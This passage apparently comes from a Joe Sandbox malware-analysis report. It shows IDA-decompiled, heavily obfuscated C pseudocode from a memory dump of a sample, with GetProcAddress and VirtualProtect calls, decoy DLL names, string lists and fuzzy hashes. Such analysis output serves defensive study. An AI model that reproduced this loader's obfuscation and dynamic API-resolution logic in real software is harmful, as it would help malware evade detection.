                      												} else {
                      													if((_t199 + _t199 & 0x00818191) >= 0) {
                      														_t217 = _t217 + 0x1970f;
                      														_t209 = _t209;
                      													}
                      													goto L56;
                      												}
                      											}
                      										}
                      										if(_t180 < _t180) {
                      											goto L46;
                      										}
                      										_t189 =  *0x509176; // 0x6328
                      										 *0x50bf10 =  *0x50bf10 - _t189;
                      										 *0x5091c2 =  *0x5091c2 + _t198;
                      										_t198 = _t198 + _t198 + _t198 + _t198;
                      										if((_t198 & 0x000000ad) < 0) {
                      											 *0x509244 =  *0x509244 - _t216;
                      										}
                      										goto L45;
                      									}
                      									 *(_t221 - 0x18) = "mscpxl32.dLL";
                      									_t121 = 0x4f950b;
                      									if(_t179 != _t179) {
                      										L34:
                      										if(_t81 >= 3) {
                      											goto L37;
                      										}
                      										_t119 = _t121 + 0x12d1;
                      										goto L36;
                      									}
                      									if((_t198 & 0x00008027) > 0) {
                      										L33:
                      										_t215 = 0;
                      										_t121 = _t121 + 0xeb;
                      										_t209 =  !(_t209 - 0xc7cb70);
                      										goto L34;
                      									}
                      									 *0x5091ee = _t198;
                      									_t121 = 0xba;
                      									if(_t215 != 0) {
                      										goto L40;
                      									}
                      									goto L33;
                      								}
                      								_t119 =  *(_t221 - 8) - 0x2756;
                      								if(_t119 != 0x2f38) {
                      									goto L29;
                      								}
                      								_t119 = 0;
                      								goto L26;
                      							} else {
                      								 *0x50b60a =  *0x50b60a + _t213;
                      								 *0x50bf14 = 0xbd;
                      								_t208 = _t208 - 0xd14099;
                      								 *0x509654 =  *0x509654 + _t208;
                      								 *0x50b93f =  *0x50b93f + _t208;
                      								if(0xbd <= 0x157a) {
                      									goto L23;
                      								}
                      								goto L22;
                      							}
                      						}
                      					} else {
                      						_t174 = _t174 + _t174 + 0x645f1a;
                      						 *0x50bf0f =  *0x50bf0f + _t174;
                      						if((_t193 & 0x007995e1) <= 0) {
                      							L13:
                      							 *0x50bf07 =  *0x50bf07 + _t78;
                      							L14:
                      							 *(_t221 - 8) = _t78;
                      							goto L15;
                      						}
                      						_t193 = 0x9f38;
                      						_t213 = _t213 - 0xbec1;
                      						 *0x5095fc =  *0x5095fc + _t208;
                      						_t208 = 0x50bf17;
                      						if(0x50bf17 > 0) {
                      							goto L14;
                      						}
                      						goto L13;
                      					}
                      				}
                      				if(_t171 == _t171) {
                      					_t171 = _t171 - 0x7a;
                      				}
                      				 *0x5091a0 = _t191;
                      				goto L4;
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0047AADF
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: #N;$G`}$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtPowerInformation$RegDeleteKeyExW$RtlReleaseRelativeName$]/$dpnet.dll$mscpxl32.dLL$normaliz.dll$sxproxy.dll
                      • API String ID: 190572456-2565978043
                      • Opcode ID: d92740306c486c9e6240cc79e34f6ef2ee8bb1ca9d45d91511f1ef6138e4d963
                      • Instruction ID: 898902ad519c878848d585b007c94232563633fc3f765b5a4dd9c773a8d692d5
                      • Opcode Fuzzy Hash: d92740306c486c9e6240cc79e34f6ef2ee8bb1ca9d45d91511f1ef6138e4d963
                      • Instruction Fuzzy Hash: 71C1E1B6E143438FDB009F78EC942DE7BB1EB79310B08846AC949D7366E3390949DB46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E00479F01(signed int __ecx, unsigned int __edx, signed int __edi, signed int __esi) {
                      				signed int _t53;
                      				signed int _t54;
                      				signed int _t60;
                      				signed int _t78;
                      				signed int _t82;
                      				signed int _t85;
                      				void* _t87;
                      				char _t99;
                      				signed int _t105;
                      				char* _t116;
                      				char* _t121;
                      				intOrPtr _t125;
                      				void* _t130;
                      				intOrPtr _t154;
                      				short _t155;
                      				intOrPtr _t163;
                      				signed char _t168;
                      				short _t175;
                      				signed int _t179;
                      				signed int _t187;
                      				signed int _t188;
                      				signed int _t191;
                      				short _t193;
                      				void* _t194;
                      
                      				_t187 = __edi;
                      				_t168 = __edx >> __ecx;
                      				_push( *0x509006);
                      				_t191 = __esi & 0x000000d4;
                      				_t53 =  *(_t194 - 8);
                      				_t105 = _t194 - 0x18;
                      				 *(_t194 - 8) = _t53;
                      				_t54 =  !_t53;
                      				if(_t54 >= 0x1d60) {
                      					if(_t54 < 0x287dc2) {
                      						_t105 = __ecx;
                      						 *0x509178 = __ecx - 0x6456;
                      					}
                      					if((_t168 & 0x0000008e) != 0) {
                      						 *0x509212 = _t168;
                      					}
                      					_t99 =  *0x50bf13; // -9
                      					 *0x50bf14 = _t99;
                      				}
                      				if(0xfe >= 6) {
                      					 *((intOrPtr*)(_t194 - 0x10)) =  *((intOrPtr*)(_t194 - 0x10)) + _t105;
                      				}
                      				_push( *0x5090ba);
                      				_t153 = 0x7632;
                      				_t173 = 0xa500;
                      				_t60 =  *(_t194 - 8);
                      				_t110 = "mscpxl32.dLL";
                      				_push( *0x5090d8);
                      				if("mscpxl32.dLL" != "mscpxl32.dLL") {
                      					 *0x509122 = 0x7632;
                      					_t153 = 0xffffffffff9b30b0;
                      					 *0x509184 =  *0x509184;
                      					 *0x5091b6 = 0xa500;
                      					_t173 = 0x5091ee;
                      				}
                      				 *(_t194 - 8) = _t60;
                      				_push(_t60);
                      				_push(0);
                      				_push(_t60);
                      				E004673BF(_t110);
                      				_push( *0x509062);
                      				 *((intOrPtr*)(_t194 - 0x1c)) = 0x37fedc;
                      				_t154 = _t153 + _t153;
                      				_push( *0x509150);
                      				_t116 = 0x4e2582;
                      				if( *(_t194 - 8) < 0x24a7d4) {
                      					_t116 =  *(_t194 - 0x14);
                      					_t205 = _t116 - _t116;
                      					if(_t116 < _t116) {
                      						_t116 = "CNBP_335.DLL";
                      					}
                      					_t154 =  *0x509152; // 0xe247
                      				}
                      				 *0x5091b4 = _t173;
                      				_t175 = 0x9f23;
                      				 *0x50bf12 =  *0x50bf12 + 0x9f23;
                      				 *(_t194 - 8) = E005002EA(_t116, _t154, 0x9f23, _t187, _t205);
                      				_t121 =  !( *((intOrPtr*)(_t194 - 0x10)) - 0x3bc6) +  !( *((intOrPtr*)(_t194 - 0x10)) - 0x3bc6);
                      				L00468D9F(_t121, 0x9f23, _t187, _t191, _t121, 1);
                      				_t155 =  *0x509128; // 0x5ccc
                      				if(_t155 != _t155) {
                      					 *((intOrPtr*)(_t194 - 0x28)) =  *((intOrPtr*)(_t194 - 0x28)) + _t155;
                      					 *0x50918c = _t155;
                      					 *0x5091f8 =  *0x5091f8 + 0x9280;
                      					_t175 = 0;
                      					_t191 = _t191 + 0xadd25c;
                      					 *0x509424 =  *0x509424 - _t187;
                      				}
                      				 *(_t194 - 0x14) = _t121;
                      				_t78 =  *(_t194 - 8);
                      				 *(_t194 - 0x58) = _t78;
                      				 *(_t194 - 8) = _t78;
                      				_t82 =  *(_t194 - 8);
                      				if(_t82 >= 0x2424ac) {
                      					if(_t155 <= _t155) {
                      						_t155 = 0x6f42;
                      					}
                      					 *0x50a5e0 =  *0x50a5e0 + _t175;
                      					 *0x5091b2 = _t175;
                      				}
                      				_t177 = 0x9e90;
                      				 *0x50bf13 = _t82;
                      				_t193 = _t191 + _t191 - 0xcddf;
                      				_push( *(_t194 - 0x58));
                      				_t125 = _t82 + 0x17dfe6;
                      				 *(_t194 - 0xc) = _t82;
                      				 *((intOrPtr*)(_t194 - 0x10)) = _t125;
                      				if(_t125 <= 0x3245) {
                      					 *0x509124 = _t155;
                      					_t163 =  *0x509170; // 0xfcb8
                      					_t155 = _t163 - 0x6cbb00;
                      					_t177 = 0;
                      					if(0 >= 0) {
                      						 *0x50923e =  *0x50923e + _t193;
                      					}
                      					 *0x50bf15 = 0xdb;
                      					_t187 = _t187 + _t187 + 0x402;
                      				}
                      				 *0x50bf09 =  *0x50bf09 - "wuapi.dll";
                      				if(0x2e068b <= 0x3c2b10) {
                      					_t155 = _t155 - 0x629f;
                      					_t177 = 0x50bf10;
                      				}
                      				_t179 =  !_t177;
                      				_t85 =  *(_t194 - 0xc);
                      				_push( *0x5093f8);
                      				_t188 = _t187 ^ 0x00dfbee2;
                      				 *(_t194 - 0xc) = _t85;
                      				_t130 = "api-ms-win-core-localization-l1-1-0.dll" - _t85 + 0x36;
                      				 *0x50bf0b =  *0x50bf0b + _t130;
                      				if(_t130 >= _t130) {
                      					_t179 = 0xffffffffffff6419;
                      					 *0x509230 = _t193;
                      					if(_t193 <= 0) {
                      						_t193 = _t193 - 0xbd5376;
                      						 *0x50ba8f =  *0x50ba8f - _t188;
                      					}
                      					if(_t188 >= 0) {
                      						E00509584 = _t85;
                      					}
                      					 *0x5090ae =  *0x5090ae + 0xf7 + _t85 + 0x26ae;
                      					_t155 = 0x5ddf;
                      				}
                      				 *0x509166 = _t155;
                      				 *0x5091e0 = _t179;
                      				 *(_t194 - 8) = GetProcAddress(??, ??);
                      				_t87 = E00466493(_t86, _t85, 0xffffffffff88e9d3, _t188, _t193, 0, _t86);
                      				_push(0);
                      				_push(1);
                      				_push(E0047A2EE);
                      				_push(E00466493);
                      				return _t87;
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 0047A2C9
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CNBP_335.DLL$G`}$NtSetDriverEntryOrder$RtlReleaseRelativeName$WFServicesReg.exe$_["$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$dpnet.dll$mscpxl32.dLL$wuapi.dll
                      • API String ID: 190572456-2247967915
                      • Opcode ID: 2fdac908724619ba68c6a58d5e0acf97712474f1951521e1885ac127e11245d5
                      • Instruction ID: 96312902e119c199033ed8eb33a92dee8e8fb1406ecd6d3ad292b8b30d43a415
                      • Opcode Fuzzy Hash: 2fdac908724619ba68c6a58d5e0acf97712474f1951521e1885ac127e11245d5
                      • Instruction Fuzzy Hash: FEA1DF75A103069FCB00EFB8ECD86CD7BB1EB79320F04846AD844A7366E3750949DB15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0048CDC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$G`}$IMCCPHR.exe$MapUserPhysicalPages$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$OSProvider.dll$RtlReleaseRelativeName$dpnet.dll$mscpxl32.dLL$rj6$wuapi.dll
                      • API String ID: 190572456-628137075
                      • Opcode ID: d18df73e262b0314aa58deaef17ae0c678bc675c1c40e8852fba680e858030c1
                      • Instruction ID: deaa35dda211ed40c6b9431fda4f0cba5cddf8dc0a99e36b9bcda8c836615389
                      • Opcode Fuzzy Hash: d18df73e262b0314aa58deaef17ae0c678bc675c1c40e8852fba680e858030c1
                      • Instruction Fuzzy Hash: BF719EB9A103079BCB00AFB8E8D46DDBBB1FB39320F04446AD950A7756E3390949DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: ?$G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtPowerInformation$NtSetDriverEntryOrder$OSProvider.dll$System.Xml.XmlDocument.dll$TpCaptureCaller$pYqt$wuapi.dll
                      • API String ID: 190572456-2048219164
                      • Opcode ID: 733806bad10af6a1aeb342153b127d18cc0594b02d8a1a014a9ffd44352c2204
                      • Instruction ID: 7767561ba40ad6dc2689977eb57d864523337df953ee4238dd8bc54128de38dc
                      • Opcode Fuzzy Hash: 733806bad10af6a1aeb342153b127d18cc0594b02d8a1a014a9ffd44352c2204
                      • Instruction Fuzzy Hash: 70B17879E1020A9BCB00EFB9E8D45DDBBF0FB29324F04806AD945E7356E3744A89DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 22%
                      			E004904C6() {
                      				signed int _t53;
                      				signed int _t55;
                      				signed int _t58;
                      				signed int _t60;
                      				signed int _t61;
                      				signed int _t63;
                      				signed int _t65;
                      				_Unknown_base(*)()* _t66;
                      				signed int _t68;
                      				signed int _t105;
                      				void* _t127;
                      				void* _t135;
                      				short _t137;
                      				short _t138;
                      				signed char _t155;
                      				intOrPtr _t161;
                      				void* _t162;
                      				void* _t167;
                      				void* _t168;
                      				void* _t170;
                      				void* _t175;
                      				char* _t179;
                      
                      				_push( *0x50911a);
                      				 *((intOrPtr*)(_t175 - 0x24)) =  *((intOrPtr*)(_t175 - 0x24)) - _t135;
                      				_t137 = _t135 + _t135 + 0x79;
                      				_t53 =  *(_t175 - 8);
                      				_push( *0x5090ca);
                      				_t80 = 0xbadb62;
                      				if(0xbadb62 == 0xbadb62) {
                      					 *0x50913e = _t137;
                      				}
                      				_t138 = 0x8184;
                      				 *(_t175 - 8) = _t53;
                      				_t55 =  *(_t175 - 8);
                      				 *((intOrPtr*)(_t175 - 0x10)) =  *((intOrPtr*)(_t175 - 0x10)) + _t55;
                      				 *(_t175 - 8) = _t55;
                      				L00469469(_t80, _t162, _t170, _t55);
                      				_t58 =  *(_t175 - 8);
                      				_push( *0x50914c);
                      				 *(_t175 - 8) = _t58;
                      				if(_t58 != 0x17) {
                      					L5:
                      					 *0x509166 = _t138;
                      					goto L6;
                      				} else {
                      					_t80 = "IMCCPHR.exe";
                      					if(_t80 != _t80) {
                      						L6:
                      						_t155 =  *0x5091b0; // 0x1
                      						 *0x509200 = _t155;
                      						_t60 = E005002EA(_t80, _t138, _t155, _t162, _t179);
                      						if(_t60 >= 0) {
                      							 *0x50bf17 = _t60;
                      							_t162 = _t162 + 0x8a3f9;
                      							 *0x50bf09 =  *0x50bf09 + _t60;
                      							if(_t60 >= 0x292c) {
                      								 *(_t175 - 0x1c) =  &(( *(_t175 - 0x1c))[(char*)("WSManHTTPConfig.exe")]);
                      								 *0x509182 = 0x7021;
                      							}
                      							_t155 = 0;
                      						}
                      						if((_t155 & 0x0080da5f) == 0) {
                      							 *0x509206 =  *0x509206 + _t155;
                      						}
                      						 *0x509222 = _t155;
                      						 *0x509348 =  *0x509348 - _t170;
                      						 *0x50bf14 =  *0x50bf14 - _t60;
                      						 *0x5094e4 = _t60;
                      						 *(_t175 - 0x58) = _t60;
                      						 *(_t175 - 8) = _t60;
                      						 *(_t175 - 0xc) = _t60;
                      						_t61 =  *(_t175 - 8);
                      						if(0x3c0387 < 0x3c0387) {
                      							L15:
                      							_t139 = 0x637f;
                      							if(0x637f != 0x637f) {
                      								goto L18;
                      							}
                      							_t139 = 0x62fa;
                      							_t155 = 0x92cd >> 0x62fa;
                      							goto L17;
                      						} else {
                      							_t161 =  *0x5091d8; // 0x989a
                      							_t155 = _t161 - 0x90dea1;
                      							 *0x509228 =  *0x509228 + _t155;
                      							_t170 = _t170 + _t170 - 0xad27aa;
                      							 *0x50bf15 = _t61;
                      							 *0x50900e =  *0x50900e - _t61;
                      							 *0x50bf07 =  *0x50bf07 - _t61;
                      							_t127 = 0 - _t61 + 0x2d;
                      							 *0x50bf0a =  *0x50bf0a - _t127;
                      							if(_t127 != 0x35e124) {
                      								L17:
                      								L18:
                      								 *0x50b616 =  *0x50b616 + _t170;
                      								_push( *(_t175 - 0x58));
                      								_t167 = (0 >> _t139) + (0 >> _t139);
                      								 *(_t175 - 8) = _t61;
                      								if(_t61 < 0x17) {
                      									L24:
                      									 *0x50bf0e =  *0x50bf0e + _t139;
                      									L25:
                      									 *0x50a6dc =  *0x50a6dc + _t155;
                      									_t63 =  *(_t175 - 8);
                      									_push( *0x50944c);
                      									_t168 = _t167 + _t167;
                      									 *0x5094d0 = _t63;
                      									 *(_t175 - 0xc) = _t63;
                      									 *(_t175 - 0x14) =  *(_t175 - 0xc);
                      									_t65 =  *(_t175 - 0xc);
                      									if(0x7e48 != 0x7e48) {
                      										L33:
                      										 *(_t175 - 0x1c) = "networkitemfactory.dll";
                      										_t146 = 0;
                      										_t66 = GetProcAddress(??, ??);
                      										 *0x5091f4 =  *0x5091f4 - _t155;
                      										 *(_t175 - 8) = _t66;
                      										_t68 =  *(_t175 - 8);
                      										if(0 < 0x3c8c) {
                      											L36:
                      											 *0x5091aa = 0;
                      											 *0x50bf12 =  *0x50bf12 + _t68;
                      											L37:
                      											if((_t68 & 0x000000be) >= 0) {
                      												 *0x50bf15 = _t68;
                      											}
                      											_t105 =  *0x50bf17; // -1
                      											 *(_t175 - 8) = _t68;
                      											 *0x509e54 = _t68;
                      											 *0x50bf13 = _t68;
                      											 *(_t175 - 8) = _t68;
                      											 *(_t175 - 0xc) =  !_t68;
                      											 *((intOrPtr*)(_t175 - 0x18)) = _t105 - 0xe09;
                      											_push(0);
                      											_push(0x490854);
                      											goto __ecx;
                      										}
                      										_t146 = 0;
                      										if(0 >= 0) {
                      											goto L37;
                      										}
                      										_t146 =  *0x50915e; // 0xd6d8
                      										goto L36;
                      									}
                      									if(0x7008 != 0x7008) {
                      										L29:
                      										 *0x50964e =  *0x50964e + _t168;
                      										if(_t65 >= 3) {
                      											L32:
                      											goto L33;
                      										}
                      										L31:
                      										goto L32;
                      									}
                      									 *0x50bf10 =  *0x50bf10 - _t155;
                      									if((_t155 & 0x0000009a) >= 0) {
                      										goto L31;
                      									}
                      									_t170 = _t170 + 1;
                      									goto L29;
                      								}
                      								 *((intOrPtr*)(_t175 - 0x18)) =  *((intOrPtr*)(_t175 - 0x18)) + 0x30aea0;
                      								_t139 = _t139 - 0x5f;
                      								 *0x50917c = _t139;
                      								if((_t139 & 0x00000087) != 0) {
                      									_t155 = _t155 + 0x97;
                      									 *0x50aa1c =  *0x50aa1c - _t155;
                      									 *0x509214 = _t155;
                      									_t170 = _t170 - 0xa8e506;
                      								}
                      								 *0x509340 =  *0x509340 - _t170;
                      								_t170 = _t170 + _t167;
                      								if(_t167 >= 0 || _t167 <= 0) {
                      									goto L24;
                      								} else {
                      									goto L25;
                      								}
                      							}
                      							goto L15;
                      						}
                      					}
                      					_t179 = _t80;
                      					_t138 = 0x5e46;
                      					goto L5;
                      				}
                      			}


























                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 004907AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: $5$00($G.V$IMCCPHR.exe$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$TpCaptureCaller$WSManHTTPConfig.exe$WinFax.dll$networkitemfactory.dll$sxproxy.dll
                      • API String ID: 190572456-4220570940
                      • Opcode ID: 0133344459c2b9a94e9110bb4c107467a688ad425ab490d00e2f07bd2ee4eb87
                      • Instruction ID: 213c8c1cccce8e841b276fdec85fb82eb7e9d03776fc9dd1c8ebec4899023c86
                      • Opcode Fuzzy Hash: 0133344459c2b9a94e9110bb4c107467a688ad425ab490d00e2f07bd2ee4eb87
                      • Instruction Fuzzy Hash: 9E91BCB5E102469FDB00DFB9E8982CD7FB1EB79320F08456AC948D736AE3380949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 32%
                      			E0049D876(signed char __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
                      				signed char _t43;
                      				signed char _t49;
                      				unsigned short _t54;
                      				signed char _t56;
                      				signed char _t68;
                      				char* _t72;
                      				void* _t81;
                      				char* _t82;
                      				signed int _t83;
                      				short _t117;
                      				intOrPtr _t118;
                      				signed char _t119;
                      				signed short _t136;
                      				signed int _t138;
                      				void* _t142;
                      				void* _t144;
                      				void* _t145;
                      				void* _t147;
                      				void* _t152;
                      				void* _t157;
                      
                      				_t144 = __edi;
                      				_t134 = __edx;
                      				_t43 = __eax;
                      				if(__ebx != __ecx) {
                      					L2:
                      					L3:
                      					_t152 = 0xffffffffffff303a;
                      					 *(_t157 - 0x58) = _t43;
                      					 *(_t157 - 8) = _t43;
                      					_t81 = _t43 + _t43;
                      					E00469BBC(_t81, _t144, 0xffffffffffff303a, 0, 1, _t81);
                      					_t82 = _t81 + 0x4d;
                      					if(_t82 >= 0x36) {
                      						 *0x5090c4 =  *0x5090c4 + _t82;
                      						 *(_t157 - 0x1c) = _t82;
                      					}
                      					_t49 =  *(_t157 - 8);
                      					_t117 = 0x175b75a;
                      					_t136 = _t134 + _t134 + 1;
                      					if((_t136 & 0x00009bb7) < 0) {
                      						L10:
                      						_t118 =  *0x50917c; // 0xcbc1
                      						_t119 = _t118 - 0x7f;
                      						_push( *(_t157 - 0x58));
                      						_t145 = _t144 + 0xdb510b;
                      						 *(_t157 - 8) = _t49;
                      						_t83 =  !_t82;
                      						_t54 = 0x1e43cd >> _t119;
                      						if(_t83 >= 0x32) {
                      							L13:
                      							_t145 = 0xf6a0;
                      							_t54 = 3;
                      							L14:
                      							 *0x50bf09 =  *0x50bf09 - _t54;
                      							if(_t54 == 0x2aac) {
                      								 *0x50bf0b =  *0x50bf0b + _t83;
                      							}
                      							 *0x509156 =  *0x509156 + _t119 - 0x61dd;
                      							_t138 =  !(_t136 - 1);
                      							_t56 =  *(_t157 - 8);
                      							_push( *0x5094c4);
                      							_t147 = _t145 + _t145;
                      							 *(_t157 - 8) = _t56;
                      							if(_t56 <= 0x25) {
                      								L19:
                      								 *0x509012 =  *0x509012 + _t147;
                      								goto L20;
                      							} else {
                      								 *((intOrPtr*)(_t157 - 0x28)) =  *((intOrPtr*)(_t157 - 0x28)) - 0x63f4;
                      								 *0x509190 = 0x63f4;
                      								_t142 = _t138 - 0x9342;
                      								 *0x5091fa =  *0x5091fa - _t142;
                      								 *0x50bf12 =  *0x50bf12 + _t142;
                      								_t152 = _t152 + _t152;
                      								if((_t56 & 0x000000be) != 0) {
                      									L20:
                      									 *0x509146 = 0x538319;
                      									 *(_t157 - 8) = GetProcAddress(??, ??);
                      									_t68 =  *(_t157 - 8);
                      									if(_t68 <= 0x2be529) {
                      										L23:
                      										if((_t68 & 0x000000b2) >= 0) {
                      										}
                      										L25:
                      										 *0x50a310 = _t68;
                      										 *(_t157 - 8) = _t68;
                      										 *(_t157 - 0x1c) =  *(_t157 - 0x1c) - 0x2e78d1;
                      										_push(0);
                      										_t72 = "dpnet.dll";
                      										 *(_t157 - 0x10) = _t72;
                      										_push(0);
                      										_push(0);
                      										_push(0x49db7e);
                      										_push(E00466493);
                      										return _t72;
                      									}
                      									if(0x13c0 != 0) {
                      										goto L25;
                      									}
                      									 *0x5091b4 = 0x50ab20;
                      									goto L23;
                      								}
                      								 *0x50bf14 = _t56;
                      								goto L19;
                      							}
                      						}
                      						_t83 = 0x48b15a;
                      						_t119 =  *0x509154; // 0x60e4
                      						 *((intOrPtr*)(_t157 - 0x2c)) =  *((intOrPtr*)(_t157 - 0x2c)) - _t119;
                      						_t136 = _t136 + _t136;
                      						if((_t136 & 0x00009020) < 0) {
                      							goto L14;
                      						}
                      						_t136 = 0x9fe5;
                      						 *0x50bf13 = _t54;
                      						 *0x509618 =  *0x509618 - _t145;
                      						goto L13;
                      					} else {
                      						_t144 = _t144 + 0xea8f;
                      						 *0x50bf07 =  *0x50bf07 + _t49;
                      						if(_t49 > 0xf) {
                      							L8:
                      							_t82 = 0xfe;
                      							_t117 = _t117 - 0x5daf;
                      							L9:
                      							 *0x509148 = _t117;
                      							goto L10;
                      						}
                      						_t82 = "MapUserPhysicalPages";
                      						if(_t82 > 0x37bd38) {
                      							goto L9;
                      						}
                      						goto L8;
                      					}
                      				}
                      				 *0x5091a0 = __ecx + 0x73;
                      				_t134 = (__edx & 0x0081c694) - 0x88d8d7;
                      				if((_t134 & 0x008feb19) < 0) {
                      					goto L3;
                      				}
                      				goto L2;
                      			}
























                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0049DAA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: )+$2$6$G`}$IMCCPHR.exe$MapUserPhysicalPages$NtSetDriverEntryOrder$TpCaptureCaller$WFServicesReg.exe$dpnet.dll
                      • API String ID: 190572456-187336105
                      • Opcode ID: 15c5c40213fc57d6164c3f563253a62f2f1813f1fa9ce12e8336d90126c4fa8e
                      • Instruction ID: a1a4a5c3c12e41a8afffbceb26450b1d4127d30ab9a3af00ef676db94d85b21f
                      • Opcode Fuzzy Hash: 15c5c40213fc57d6164c3f563253a62f2f1813f1fa9ce12e8336d90126c4fa8e
                      • Instruction Fuzzy Hash: BD710376E142068FEB00AF79DC993DE3FB1EB79310F08447A8955A73A6E3380949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 32%
                      			E004F4A5A() {
                      				signed int _t42;
                      				signed int _t45;
                      				signed int _t49;
                      				signed int _t57;
                      				signed int _t58;
                      				int _t60;
                      				char* _t61;
                      				signed int _t66;
                      				signed int _t69;
                      				signed int _t77;
                      				signed int _t82;
                      				int _t88;
                      				void* _t89;
                      				void* _t102;
                      				short _t104;
                      				void* _t116;
                      				void* _t117;
                      				signed int _t119;
                      				signed int _t120;
                      				void* _t122;
                      
                      				asm("adc eax, 0x5091ac");
                      				_t111 = 0x9c3d;
                      				_t42 =  *(_t122 - 8);
                      				_t77 = _t42;
                      				 *(_t122 - 0xc) = _t42;
                      				_t45 =  *(_t122 - 0x50);
                      				 *0x50bf13 = _t45;
                      				_t120 = _t119;
                      				 *(_t122 - 8) = _t45;
                      				if(_t45 >= 0x16b9ca) {
                      					_t77 = 0x3a1515;
                      					 *(_t122 - 0x14) = 0x3a1515;
                      					 *0x509182 = 0x682e;
                      					_t102 = 0x1046b;
                      					_t111 =  *0x5091b6; // 0xc472
                      					if((_t111 & 0x00008f9b) > 0) {
                      						 *0x509206 = _t111;
                      					}
                      					 *0x509222 = _t111;
                      					_t45 = 0xc2;
                      					 *0x50b744 =  *0x50b744 - _t120;
                      				}
                      				 *0x50bf14 = _t45;
                      				_t117 = _t116 + 0xd5a6c6;
                      				 *0x509664 =  *0x509664 - _t117;
                      				_t49 =  *(_t122 - 8);
                      				 *(_t122 - 0xac) = _t49;
                      				 *(_t122 - 8) = _t49;
                      				 *0x50908e =  *0x50908e;
                      				_t53 =  *(_t122 - 8);
                      				_t82 = (_t77 ^ 0x00004bc7) - 0x1446e8 + 0x3dd491;
                      				E004ECD9A( *(_t122 - 8), _t82, _t102, _t120,  *(_t122 - 8), _t53);
                      				_t57 =  *(_t122 - 8);
                      				 *(_t122 - 0x14) = _t82;
                      				_push( *(_t122 - 0xac));
                      				_t104 = _t102 - 0x53fb37 + 0x6a21dd;
                      				 *(_t122 - 8) = _t57;
                      				if(_t57 <= 0x18c4) {
                      					L6:
                      					_t58 =  *0x50bf13; // -9
                      					_t120 =  !(_t120 - 1);
                      					goto L7;
                      				} else {
                      					_t58 =  *(_t122 - 0xc);
                      					_t104 = 0x679c;
                      					 *0x509182 = 0x679c;
                      					_t111 = _t111 - 0x804883;
                      					if((_t111 & 0x000096eb) < 0) {
                      						L7:
                      						 *0x50bf14 = _t58;
                      						_t60 = VirtualProtect(??, ??, ??, ??);
                      						 *0x50bf11 =  *0x50bf11 - _t111;
                      						if((_t111 & 0x0000009a) != 0) {
                      							L12:
                      							 *((intOrPtr*)(_t122 - 0x18)) = 0x3b71ab;
                      							_t88 = 0;
                      							_t104 = _t104 - 0x57bab4 + 0x69b3;
                      							 *0x509186 = _t104;
                      							L13:
                      							asm("sbb eax, eax");
                      							_t89 = _t88 - 0xb5;
                      							 *(_t122 - 8) = _t60;
                      							_t61 = "api-ms-win-core-namedpipe-l1-1-0.dll";
                      							if(_t61 != 0x2cb7) {
                      								L19:
                      								L20:
                      								 *0x50bf15 = _t61;
                      								_t61 =  *0x50bf17; // -1
                      								L21:
                      								 *0x50bf07 =  *0x50bf07 - _t61;
                      								 *0x509030 =  *0x509030 + _t61;
                      								_t66 =  *(_t122 - 8) + 1;
                      								 *(_t122 - 8) = _t66;
